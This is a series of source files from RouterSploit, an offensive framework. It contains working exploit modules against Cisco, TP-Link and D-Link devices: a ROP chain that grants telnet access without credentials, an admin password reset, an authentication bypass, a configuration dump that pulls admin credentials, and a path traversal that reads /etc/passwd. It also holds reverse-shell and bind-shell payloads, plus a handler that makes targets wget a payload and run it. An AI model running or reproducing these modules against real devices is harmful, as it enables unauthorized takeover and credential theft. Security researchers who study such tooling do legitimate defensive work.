            "os.dup2(s.fileno(), 0)\n" +
            "os.dup2(s.fileno(), 1)\n" +
            "os.dup2(s.fileno(), 2)\n" +
            "pty.spawn('/bin/sh');\n" +
            "s.close()\n"
        )



from routersploit.core.exploit import *
from routersploit.core.tcp.tcp_client import TCPClient
from routersploit.core.telnet.telnet_client import TelnetClient


class Exploit(TCPClient, TelnetClient):
    __info__ = {
        "name": "Cisco Catalyst 2960 ROCEM RCE",
        "description": "Module exploits Cisco Catalyst 2960 ROCEM RCE vulnerability. "
                       "If target is vulnerable, it is possible to patch execution flow "
                       "to allow credless telnet interaction with highest privilege level.",
        "authors": (
            "Artem Kondratenko <@artkond>",  # analysis & python exploit
            "Marcin Bury <marcin[at]threat9.com>"  # routersploit module
        ),
        "references": (
            "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3881",
            "https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/",
            "https://www.exploit-db.com/exploits/41872/",
            "https://www.exploit-db.com/exploits/41874/",
        ),
        "devices": (
            "Cisco Catalyst 2960 IOS 12.2(55)SE1",
            "Cisco Catalyst 2960 IOS 12.2(55)SE11",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(23, "Target Telnet port")

    action = OptString("set", "set / unset credless authentication for Telnet service")
    device = OptInteger(-1, "Target device - use 'show devices'")

    def __init__(self):
        self.payloads = [
            # Cisco Catalyst 2960 IOS 12.2(55)SE1
            {
                "template": (
                    b"\xff\xfa\x24\x00" +
                    b"\x03CISCO_KITS\x012:" +
                    b"A" * 116 +
                    # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
                    b"\x00\x00\x37\xb4" +
                    # next bytes are shown as offsets from r1
                    # +8  address of pointer to is_cluster_mode function - 0x34
                    b"\x02\x2c\x8b\x74" +
                    b"{FUNC_IS_CLUSTER_MODE}" +
                    # +16(+0) r1 points here at second gadget
                    b"BBBB" +
                    # +4 second gadget address 0x00dffbe8: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;
                    b"\x00\xdf\xfb\xe8" +
                    # +8
                    b"CCCC" +
                    # +12
                    b"DDDD" +
                    # +16(+0) r1 points here at third gadget
                    b"EEEE" +
                    # +20(+4) third gadget address. 0x0006788c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr;
                    b"\x00\x06\x78\x8c" +
                    # +8  r1+8 = 0x022c8b60
                    b"\x02\x2c\x8b\x60" +
                    # +12
                    b"FFFF" +
                    # +16(+0) r1 points here at fourth gadget
                    b"GGGG" +
                    # +20(+4) fourth gadget address 0x006ba128: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
                    b"\x00\x6b\xa1\x28" +
                    b"{FUNC_PRIVILEGE_LEVEL}" +
                    # +12
                    b"HHHH" +
                    # +16(+0) r1 points here at fifth gadget
                    b"IIII" +
                    # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
                    b"\x01\x48\xe5\x60" +
                    # +8 r1 points here at third gadget
                    b"JJJJ" +
                    # +12
                    b"KKKK" +
                    # +16
                    b"LLLL" +
                    # +20 original execution flow return addr
                    b"\x01\x13\x31\xa8" +
                    b":15:" + b"\xff\xf0"
                ),
                "func_is_cluster_mode": {
                    # +12 set  address of func that rets 1
                    "set": b"\x00\x00\x99\x80",
                    # unset
                    "unset": b"\x00\x04\xea\x58"
                },
                "func_privilege_level": {
                    # +8 address of the replacing function that returns 15 (our desired privilege level). 0x0012521c: li r3, 0xf; blr;
                    "set": b"\x00\x12\x52\x1c",
                    # unset
                    "unset": b"\x00\x04\xe6\xf0"
                }
            },

            # Cisco Catalyst 2960 IOS 12.2(55)SE11
            {
                "template": (
                    b"\xff\xfa\x24\x00" +
                    b"\x03CISCO_KITS\x012:" +
                    b"A" * 116 +
                    # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
                    b"\x00\x00\x37\xb4" +
                    # next bytes are shown as offsets from r1
                    # +8  address of pointer to is_cluster_mode function - 0x34
                    b"\x02\x3d\x55\xdc" +
                    b"{FUNC_IS_CLUSTER_MODE}" +
                    # +16(+0) r1 points here at second gadget
                    b"BBBB" +
                    # +4 second gadget address 0x00e1a9f4: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;
                    b"\x00\xe1\xa9\xf4" +
                    # +8
                    b"CCCC" +
                    # +12
                    b"DDDD" +
                    # +16(+0) r1 points here at third gadget
                    b"EEEE" +
                    # +20(+4) third gadget address. 0x00067b5c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr;
                    b"\x00\x06\x7b\x5c" +
                    # +8  r1+8 = 0x23d55c8
                    b"\x02\x3d\x55\xc8" +
                    # +12
                    b"FFFF" +
                    # +16(+0) r1 points here at fourth gadget
                    b"GGGG" +
                    # +20(+4) fourth gadget address 0x006cb3a0: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
                    b"\x00\x6c\xb3\xa0" +
                    b"{FUNC_PRIVILEGE_LEVEL}" +
                    # +12
                    b"HHHH" +
                    # +16(+0) r1 points here at fifth gadget
                    b"IIII" +
                    # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
                    b"\x01\x4a\xcf\x98" +
                    # +8 r1 points here at third gadget
                    b"JJJJ" +
                    # +12
                    b"KKKK" +
                    # +16
                    b"LLLL" +
                    # +20 original execution flow return addr
                    b"\x01\x14\xe7\xec" +
                    b":15:" + b"\xff\xf0"
                ),
                "func_is_cluster_mode": {
                    # +12 set  address of func that rets 1
                    "set": b"\x00\x00\x99\x9c",
                    # unset
                    "unset": b"\x00\x04\xeA\xe0"
                },
                "func_privilege_level": {
                    # +8 address of the replacing function that returns 15 (our desired privilege level). 0x00270b94: li r3, 0xf; blr;
                    "set": b"\x00\x27\x0b\x94",
                    # unset
                    "unset": b"\x00\x04\xe7\x78"
                }
            }
        ]

    def run(self):
        if int(self.device) < 0 or int(self.device) >= len(self.payloads):
            print_error("Set target device - use \"show devices\" and \"set device <id>\"")
            return

        if self.action not in ["set", "unset"]:
            print_error("Specify action: set / unset credless authentication for Telnet service")
            return

        print_status("Trying to connect to Telnet service on port {}".format(self.port))

        tcp_client = self.tcp_create()
        if tcp_client.connect():
            response = tcp_client.recv(1024)
            print_status("Connection OK")
            print_status("Received bytes from telnet service: {}".format(repr(response)))
        else:
            print_error("Connection failed")
            return

        print_status("Building payload...")
        payload = self.build_payload()

        if self.action == "set":
            print_status("Setting credless privilege 15 authentication")
        else:
            print_status("Unsetting credless privilege 15 authentication")

        print_status("Sending cluster option")
        tcp_client.send(payload)
        tcp_client.close()

        print_status("Payload sent")

        if self.action == "set":
            print_status("Connecting to Telnet service...")
            telnet_client = self.telnet_create()
            if telnet_client.connect():
                telnet_client.interactive()
            else:
                print_error("Exploit failed")
        else:
            print_status("Check if Telnet authentication was set back")

    def build_payload(self):
        payload = self.payloads[self.device]['template']
        payload = payload.replace(b"{FUNC_IS_CLUSTER_MODE}", self.payloads[self.device]['func_is_cluster_mode'][self.action])
        payload = payload.replace(b"{FUNC_PRIVILEGE_LEVEL}", self.payloads[self.device]['func_privilege_level'][self.action])

        return payload

    @mute
    def check(self):
        # it is not possible to verify if target is vulnerable without exploiting system
        return None



import socket
# import telnetlib
import binascii
from http.server import BaseHTTPRequestHandler, HTTPServer
import threading
import time
import importlib

from routersploit.core.exploit.printer import (
    printer_queue,
    print_info,
    print_error,
    print_success,
    print_status,
    print_table,
)

from routersploit.core.exploit.utils import (
    index_modules,
    random_text,
)


def shell(exploit, architecture="", method="", payloads=None, **params):
    available_payloads = {}
    payload = None
    options = []

    if architecture and method:
        # get all payloads for given architecture
        all_payloads = [p.replace("payloads.", "").replace(".", "/") for p in index_modules() if "payloads.{}".format(architecture) in p]

        for p in all_payloads:
            module = getattr(importlib.import_module("routersploit.modules.payloads." + p.replace("/", ".")), "Payload")

            # if method/arch is cmd then filter out payloads
            if method == "cmd":
                if getattr(module, "cmd") in payloads:
                    available_payloads[p] = module
            else:
                available_payloads[p] = module

    print_info()
    print_success("Welcome to cmd. Commands are sent to the target via the execute method.")
    print_status("For further exploitation use 'show payloads' and 'set payload <payload>' commands.")
    print_info()

    while True:
        while not printer_queue.empty():
            pass

        if payload is None:
            cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > "
        else:
            cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(payload._Payload__info__["name"])

        cmd = input(cmd_str)

        if cmd in ["quit", "exit"]:
            return

        elif cmd == "show payloads":
            if not available_payloads:
                print_error("There are no available payloads for this exploit")
                continue

            print_status("Available payloads:")
            headers = ("Payload", "Name", "Description")
            data = []
            for p, v in available_payloads.items():
                data.append((p, v._Payload__info__["name"], v._Payload__info__["description"]))

            print_table(headers, *data)

        elif cmd.startswith("set payload "):
            if not available_payloads:
                print_error("There are no available payloads for this exploit")
                continue

            c = cmd.split(" ")

            if c[2] in available_payloads.keys():
                payload = available_payloads[c[2]]()

                options = []
                for option, attr in payload.exploit_attributes.items():
                    if option not in ["output", "filepath"]:
                        options.append([option, getattr(payload, option), attr[1]])

                if payload.handler == "bind_tcp":
                    options.append(["rhost", exploit.target, "Target IP address"])

                    if method == "wget":
                        options.append(["lhost", "", "Connect-back IP address for wget"])
                        options.append(["lport", 4545, "Connect-back Port for wget"])
            else:
                print_error("Payload not available")

        elif payload is not None:
            if cmd == "show options":
                headers = ("Name", "Current settings", "Description")

                print_info('\nPayload Options:')
                print_table(headers, *options)
                print_info()

            elif cmd.startswith("set "):
                c = cmd.split(" ")
                if len(c) != 3:
                    print_error("set <option> <value>")
                else:
                    for option in options:
                        if option[0] == c[1]:
                            try:
                                setattr(payload, c[1], c[2])
                            except Exception:
                                print_error("Invalid value for {}".format(c[1]))
                                break

                            option[1] = c[2]
                            print_info("{} => {}".format(c[1], c[2]))

            elif cmd == "run":
                data = payload.generate()

                if method == "wget":
                    elf_binary = payload.generate_elf(data)
                    communication = Communication(exploit, elf_binary, options, **params)
                    if communication.wget() is False:
                        print_error("Exploit failed to transfer payload")
                        continue

                elif method == "echo":
                    elf_binary = payload.generate_elf(data)
                    communication = Communication(exploit, elf_binary, options, **params)
                    communication.echo()

                elif method == "cmd":
                    params["exec_binary"] = data
                    communication = Communication(exploit, "", options, **params)

                if payload.handler == "bind_tcp":
                    communication.bind_tcp()
                elif payload.handler == "reverse_tcp":
                    communication.reverse_tcp()

            elif cmd == "back":
                payload = None

        else:
            print_status("Executing '{}' on the device...".format(cmd))
            print_info(exploit.execute(cmd))


class HttpRequestHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()

        self.wfile.write(self.server.content)
        self.server.stop = True

    def log_message(self, format, *args):
        return


class HttpServer(HTTPServer):
    def serve_forever(self, content):
        self.stop = False
        self.content = content
        while not self.stop:
            self.handle_request()


class Communication:
    def __init__(self, exploit, payload, options, location="", wget_options={}, echo_options={}, exec_binary=None):
        self.exploit = exploit
        self.payload = payload
        self.options = {option[0]: option[1] for option in options}

        # location to save the payload e.g. /tmp/
        self.location = location

        # transfer techniques
        self.wget_options = wget_options
        self.echo_options = echo_options

        # process of executing payload
        self.exec_binary = exec_binary

        # name of the binary - its random 8 bytes
        self.binary_name = None

        self.port_used = False
        self.mutex = False

    def http_server(self, lhost, lport):
        print_status("Setting up HTTP server")

        try:
            server = HttpServer((lhost, int(lport)), HttpRequestHandler)
        except socket.error:
            self.port_used = True
            self.mutex = False
            return None

        self.mutex = False

        server.serve_forever(self.payload)
        server.server_close()

    def wget(self):
        print_status("Using wget method")
        self.binary_name = random_text(8)

        if "binary" in self.wget_options.keys():
            binary = self.wget_options['binary']
        else:
            binary = "wget"

        # run http server
        all_interfaces = "0.0.0.0"
        try:
            server = HttpServer((all_interfaces, int(self.options["lport"])), HttpRequestHandler)
        except socket.error:
            print_error("Could not set up HTTP Server on {}:{}".format(self.options["lhost"], self.options["lport"]))
            return False

        thread = threading.Thread(target=server.serve_forever, args=(self.payload,))
        thread.start()

        # wget binary
        print_status("Using wget to download binary")
        cmd = "{} http://{}:{}/{} -qO {}/{}".format(binary,
                                                    self.options["lhost"],
                                                    self.options["lport"],
                                                    self.binary_name,
                                                    self.location,
                                                    self.binary_name)

        self.exploit.execute(cmd)

        thread.join(10)
        if thread.is_alive():
            assassin = threading.Thread(target=server.shutdown)
            assassin.daemon = True
            assassin.start()
            return False

        return True

    def echo(self):
        print_status("Using echo method")
        self.binary_name = random_text(8)

        path = "{}/{}".format(self.location, self.binary_name)

        # echo stream e.g. echo -ne {} >> {}
        if "stream" in self.echo_options.keys():
            echo_stream = self.echo_options["stream"]
        else:
            echo_stream = 'echo -ne "{}" >> {}'

        # echo prefix e.g. "\\x"
        if "prefix" in self.echo_options.keys():
            echo_prefix = self.echo_options["prefix"]
        else:
            echo_prefix = "\\x"

        # echo max length of the block
        if "max_length" in self.echo_options.keys():
            echo_max_length = int(self.echo_options["max_length"])
        else:
            echo_max_length = 30

        size = len(self.payload)
        num_parts = int(size / echo_max_length) + 1

        # transfer binary through echo command
        print_status("Sending payload to {}".format(path))
        for i in range(0, num_parts):
            current = i * echo_max_length
            print_status("Transferring {}/{} bytes".format(current, len(self.payload)))

            block = str(binascii.hexlify(self.payload[current:current + echo_max_length]), "utf-8")
            block = echo_prefix + echo_prefix.join(a + b for a, b in zip(block[::2], block[1::2]))
            cmd = echo_stream.format(block, path)
            self.exploit.execute(cmd)

    def listen(self, lhost, lport):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

        try:
            sock.bind((lhost, int(lport)))
            sock.listen(5)
        except socket.error:
            self.port_used = True
            return None

        return sock

    def build_commands(self):
        path = "{}/{}".format(self.location, self.binary_name)

        commands = []

        # set of instructions to execute payload on the device
        if isinstance(self.exec_binary, list) or isinstance(self.exec_binary, tuple):
            for item_exec_binary in self.exec_binary:
                if isinstance(item_exec_binary, str):
                    try:
                        commands.append(item_exec_binary.format(path))
                    except (KeyError, ValueError):
                        commands.append(item_exec_binary)
                elif callable(item_exec_binary):
                    commands.append(item_exec_binary(path))

        # instruction to execute cmd payload e.g. netcat / awk
        elif isinstance(self.exec_binary, str):
            try:
                commands.append(self.exec_binary.format(path))
            except (KeyError, ValueError):
                commands.append(self.exec_binary)

        # default way of executing payload
        else:
            exec_binary_str = "chmod 777 {0}; {0}; rm {0}".format(path)
            commands.append(exec_binary_str)

        return commands

    def reverse_tcp(self):
        all_interfaces = "0.0.0.0"
        sock = self.listen(all_interfaces, self.options["lport"])
        if self.port_used:
            print_error("Could not set up listener on {}:{}".format(all_interfaces, self.options["lport"]))
            return

        # execute binary
        commands = self.build_commands()

        print_status("Executing payload on the device")

        # synchronized commands
        for command in commands[:-1]:
            self.exploit.execute(command)

        # asynchronous last command to execute binary & rm binary
        thread = threading.Thread(target=self.exploit.execute, args=(commands[-1],))
        thread.start()

        # waiting for shell
        print_status("Waiting for reverse shell...")
        client, addr = sock.accept()
        sock.close()
        print_status("Connection from {}:{}".format(addr[0], addr[1]))

        print_success("Enjoy your shell")
        raise NotImplementedError("Telnet patched out for compatibiltiy with Python 3.13")
        # t = telnetlib.Telnet()
        # t.sock = client
        # t.interact()

    def bind_tcp(self):
        # execute binary
        commands = self.build_commands()

        # synchronized commands
        for command in commands[:-1]:
            self.exploit.execute(command)

        # asynchronous last command to execute binary & rm binary
        thread = threading.Thread(target=self.exploit.execute, args=(commands[-1],))
        thread.start()

        # connecting to shell
        print_status("Connecting to {}:{}".format(self.options['rhost'], self.options['rport']))
        time.sleep(2)

        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((self.options["rhost"], int(self.options["rport"])))
        except socket.error:
            print_error("Could not connect to {}:{}".format(self.options["rhost"], self.options["rport"]))
            return

        print_success("Enjoy your shell")
        raise NotImplementedError("Telnet patched out for compatibiltiy with Python 3.13")
        # tn = telnetlib.Telnet()
        # tn.sock = sock
        # tn.interact()



from routersploit.core.exploit import *
from routersploit.modules.payloads.python.bind_udp import Payload as PythonBindUDP


class Payload(PythonBindUDP):
    __info__ = {
        "name": "Python Bind UDP One-Liner",
        "description": "Creates interactive udp bind shell by using python one-liner.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        )
    }

    cmd = OptString("python", "Python binary")

    def generate(self):
        self.fmt = self.cmd + ' -c "{}"'
        payload = super(Payload, self).generate()
        return payload



import math

from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class ExploitError(Exception):
    def __init__(self, msg: str = ""):
        super(Exception, self).__init__(msg)


class Exploit(HTTPClient):
    __info__ = {
        "name": "TP-Link Archer C9 admin password reset (CVE-2017-11519)",
        "description": "Module exploits TP-Link Archer C9 password "
                       "reset feature by leveraging a predictable "
                       "random number generator seed.",
        "authors": (
            "William Bowling (wbowling.info)",  # vulnerability discovery and PoC
            "Vadim Yanitskiy <axilirator[at]gmail.com>",  # routersploit module
        ),
        "references": (
            "https://devcraft.io/posts/2017/07/21/tp-link-archer-c9-admin-password-reset.html",
            "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11519",
        ),
        "devices": (
            "TP-Link Archer C60",
            "TP-Link Archer C9",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    RAND_MAX = 0x7fffffff

    def get_time(self) -> int:
        print_status("Getting current time at the target")

        response = self.http_request(
            method="GET",
            path="/",
        )

        if response is None:
            raise ExploitError
        if response.status_code != 200:
            raise ExploitError
        if "Date" not in response.headers:
            raise ExploitError

        import email.utils as eu

        date = response.headers["Date"]
        return eu.mktime_tz(eu.parsedate_tz(date))

    def gen_reset_code(self):
        print_status("Generating reset code at the target")

        response = self.http_request(
            method="POST",
            path="/cgi-bin/luci/;stok=/login?form=vercode",
            data={"operation": "read"},
        )

        if response is None:
            raise ExploitError
        if response.status_code != 200:
            raise ExploitError

    def try_reset_code(self, seed: int) -> bool:
        code = self.get_random(seed, 100000, 999999)
        print_status("Trying code %d (seed %d)" % (code, seed))

        response = self.http_request(
            method="POST",
            path="/cgi-bin/luci/;stok=/login?form=vercode",
            data={"operation": "write", "vercode": code},
        )

        if response is None:
            raise ExploitError
        if response.status_code != 200:
            raise ExploitError

        return response.json()["success"]

    def guess_reset_code(self, time: int):
        print_status("Guessing reset code")

        for seed in range(time, time + 5):
            if self.try_reset_code(seed):
                print_success("admin's password has been reset!")
                return
        print_error("Could not guess the reset code")

    # from https://github.com/qbx2/python_glibc_random
    def glibc_prng(self, seed: int):
        def int32(x: int) -> int:
            if x & 0xffffffff > 0x7fffffff:
                return x & 0xffffffff - 0x100000000
            else:
                return x & 0xffffffff

        def int64(x: int) -> int:
            if x & 0xffffffffffffffff > 0x7fffffffffffffff:
                return x & 0xffffffffffffffff - 0x10000000000000000
            else:
                return x & 0xffffffffffffffff

        r = [0] * 344
        r[0] = seed

        for i in range(1, 31):
            r[i] = int32(int64(16807 * r[i - 1]) % 0x7fffffff)
            if r[i] < 0:
                r[i] = int32(r[i] + 0x7fffffff)
        for i in range(31, 34):
            r[i] = int32(r[i - 31])
        for i in range(34, 344):
            r[i] = int32(r[i - 31] + r[i - 3])

        i = 344 - 1

        while True:
            i += 1
            r.append(int32(r[i - 31] + r[i - 3]))
            yield int32((r[i] & 0xffffffff) >> 1)

    def get_random(self, seed: int, t: int, u: int) -> int:
        prng = self.glibc_prng(seed)
        r = float(next(prng)) % self.RAND_MAX / self.RAND_MAX
        return int(math.floor(r * (u - t + 1)) + t)

    def _check(self) -> bool:
        try:
            self.time = self.get_time()
            self.gen_reset_code()
            return True
        except ExploitError:
            return False

    @mute
    def check(self) -> bool:
        return self._check()

    def run(self):
        if self._check():
            self.guess_reset_code(self.time)
        else:
            print_error("Device seems to be not vulnerable")



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Cisco IOS HTTP Unauthorized Administrative Access",
        "description": "HTTP server for Cisco IOS 11.3 to 12.2 allows attackers "
                       "to bypass authentication and execute arbitrary commands, "
                       "when local authorization is being used, by specifying a high access level in the URL.",
        "authors": (
            "renos stoikos <rstoikos[at]gmail.com>",  # routesploit module
        ),
        "references": (
            "http://www.cvedetails.com/cve/cve-2001-0537",
        ),
        "devices": (
            "IOS 11.3 -> 12.2 are reportedly vulnerable",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    show_command = OptString("show startup-config", "Command to be executed e.g show startup-config")

    def __init__(self):
        self.access_level = None

    def run(self):
        if self.check():
            print_success("Target is vulnerable")

            path = "/level/{}/exec/-/{}".format(self.access_level, self.show_command)
            response = self.http_request(
                method="GET",
                path=path
            )
            if response is None:
                print_error("Could not execute command")  # target is not vulnerable
                return
            else:
                print_success("Exploit success! - executing command")
                print_info(re.sub('<[^<]+?>', '', response.text))
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        for num in range(16, 100):
            path = "/level/{}/exec/-/{}".format(num, self.show_command)
            response = self.http_request(
                method="GET",
                path=path
            )
            if response is None:  # target does not respond
                break

            if response.status_code == 200 and "Command was:  {}".format(self.show_command) in response.text:
                self.access_level = num
                return True  # target is vulnerable

        return False  # target is not vulnerable



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "D-Link DCS Cameras Authentication Bypass",
        "description": "D-Link DCS web cameras allow unauthenticated attackers to obtain the "
                       "configuration of the device remotely. A copy of the device configuration "
                       "can be obtained by accessing unprocteted URL. ",
        "authors": (
            "Roberto Paleari",  # vulnerability discovery
            "Dino Causevic",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/24442/",
        ),
        "devices": (
            "D-Link DCS-930L, firmware version 1.04",
            "D-Link DCS-932L, firmware version 1.02"
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(8080, "Target HTTP port")

    def __init__(self):
        self.config_content = None

    def run(self):
        if self.check():
            print_success("Target appears to be vulnerable.")

            admin_id = None
            admin_password = None

            if self.config_content and len(self.config_content):

                for line in self.config_content.split("\n"):
                    line = line.strip()

                    m_groups = re.match(r"AdminID=(.*)", line, re.I | re.M)
                    if m_groups:
                        print_success("Found Admin ID.")
                        admin_id = m_groups.group(1)

                    m_groups = re.match(r'AdminPassword=(.*)', line, re.I | re.M)
                    if m_groups:
                        print_success("Found Admin password.")
                        admin_password = m_groups.group(1)
                        break

                print_table(("AdminId", "Password"), (admin_id, admin_password))

        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/frame/GetConfig"
        )

        if response and response.status_code == 200 and len(response.content):
            self.config_content = self._deobfuscate(response.content)

            if self.config_content and any([x in self.config_content for x in ["AdminID=", "AdminPassword="]]):
                return True  # target is vulnerable

        return False  # target is not vulnerable

    def _deobfuscate(self, config):

        def chain(lambdas, value):
            r_chain = None

            for lambda_function in lambdas:
                r_chain = value = lambda_function(value)

            return r_chain

        arr_c = [chain([
            lambda d: (d + ord('y')) & 0xff,
            lambda d: (d ^ ord('Z')) & 0xff,
            lambda d: (d - ord('e')) & 0xff
        ], t) for t in config]

        arr_c_len = len(arr_c)
        tmp = ((arr_c[arr_c_len - 1] & 7) << 5) & 0xff

        for t in reversed(range(arr_c_len)):

            if t == 0:
                ct = chain([
                    lambda d: (d >> 3) & 0xff,
                    lambda d: (d + tmp) & 0xff
                ], arr_c[t])
            else:
                ct = (((arr_c[t] >> 3) & 0xff) + (((arr_c[t - 1] & 0x7) << 5) & 0xff)) & 0xff

            arr_c[t] = ct

        tmp_str = "".join(map(chr, arr_c))
        ret_str = ""

        if len(tmp_str) % 2 != 0:
            print_error("Config file can't be deobfuscated.")
            return None

        half_str_len = int(len(tmp_str) / 2)
        for i in range(half_str_len):
            ret_str += tmp_str[i + half_str_len] + tmp_str[i]

        return ret_str



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Cisco Unified Multi Path Traversal",
        "description": "Module exploits path traversal vulnerability in Cisco Unified Communications Manager, "
                       "Cisco Unified Contact Center Express and Cisco Unified IP Interactive Voice Response devices."
                       "If the target is vulnerable it allows to read files from the filesystem.",
        "authors": (
            "Facundo M. de la Cruz (tty0) <fmdlc[at]code4life.com.ar>",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/36256/",
            "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3315",
        ),
        "devices": (
            "Cisco Unified Communications Manager 5.x",
            "Cisco Unified Communications Manager 6.x < 6.1(5)",
            "Cisco Unified Communications Manager 7.x < 7.1(5b)",
            "Cisco Unified Communications Manager 8.x < 8.0(3)",
            "Cisco Unified Contact Center Express",
            "Cisco Unified IP Interactive Voice Response < 6.0(1)",
            "Cisco Unified IP Interactive Voice Response 7.0(x) < 7.0(2)",
            "Cisco Unified IP Interactive Voice Response 8.0(x) < 8.5(1)",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")
    filename = OptString("/etc/passwd", 'File to read from the filesystem')

    def run(self):
        if self.check():
            path = "/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../..{}".format(self.filename)

            response = self.http_request(
                method="GET",
                path=path
            )
            if response is None:
                return

            if response.status_code == 200 and len(response.text):
                print_success("Exploit success - reading file {}".format(self.filename))
                print_info(response.text)
            else:
                print_error("Exploit failed - could not read file")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        path = "/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd"

        response = self.http_request(
            method="GET",
            path=path
        )
        if response is None:
            return False  # target is not vulnerable

        if response.status_code == 200 and utils.detect_file_content(response.text, "/etc/passwd"):
            return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit.encoders import BaseEncoder
from routersploit.core.exploit.payloads import Architectures


class Encoder(BaseEncoder):
    __info__ = {
        "name": "Python Hex Encoder",
        "description": "Module encodes Python payload to Hex format.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
    }

    architecture = Architectures.PYTHON

    def encode(self, payload):
        encoded_payload = bytes(payload, "utf-8").hex()
        return "exec('{}'.decode('hex'))".format(encoded_payload)



##############################################################
# Lempel-Ziv-Stac decompression
# BitReader and RingList classes
#
# Copyright (C) 2011  Filippo Valsorda - FiloSottile
# filosottile.wiki gmail.com - www.pytux.it
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see &lt;http://www.gnu.org/licenses/&gt;.
#
##############################################################

import collections


class BitReader:
    """
    Gets a string or a iterable of chars (also mmap)
    representing bytes (ord) and permits to extract
    bits one by one like a stream
    """

    def __init__(self, data_bytes):
        self._bits = collections.deque()

        for byte in data_bytes:
            for n in range(8):
                self._bits.append(bool((byte >> (7 - n)) & 1))

    def getBit(self):
        return self._bits.popleft()

    def getBits(self, num):
        res = 0
        for i in range(num):
            res += self.getBit() << num - 1 - i
        return res

    def getByte(self):
        return self.getBits(8)

    def __len__(self):
        return len(self._bits)


class RingList:
    """
    When the list is full, for every item appended
    the older is removed
    """

    def __init__(self, length):
        self.__data__ = collections.deque()
        self.__full__ = False
        self.__max__ = length

    def append(self, x):
        if self.__full__:
            self.__data__.popleft()
        self.__data__.append(x)
        if self.size() == self.__max__:
            self.__full__ = True

    def get(self):
        return self.__data__

    def size(self):
        return len(self.__data__)

    def maxsize(self):
        return self.__max__

    def __getitem__(self, n):
        if n >= self.size():
            return None
        return self.__data__[n]


def LZSDecompress(data, window=RingList(2048)):
    """
    Gets a string or a iterable of chars (also mmap)
    representing bytes (ord) and an optional
    pre-populated dictionary; return the decompressed
    string and the final dictionary
    """
    reader = BitReader(data)
    result = ''

    while True:
        bit = reader.getBit()
        if not bit:
            char = reader.getByte()
            result += chr(char)
            window.append(char)
        else:
            bit = reader.getBit()
            if bit:
                offset = reader.getBits(7)
                if offset == 0:
                    # EOF
                    break
            else:
                offset = reader.getBits(11)

            lenField = reader.getBits(2)
            if lenField < 3:
                length = lenField + 2
            else:
                lenField <<= 2
                lenField += reader.getBits(2)
                if lenField < 15:
                    length = (lenField & 0x0f) + 5
                else:
                    lenCounter = 0
                    lenField = reader.getBits(4)
                    while lenField == 15:
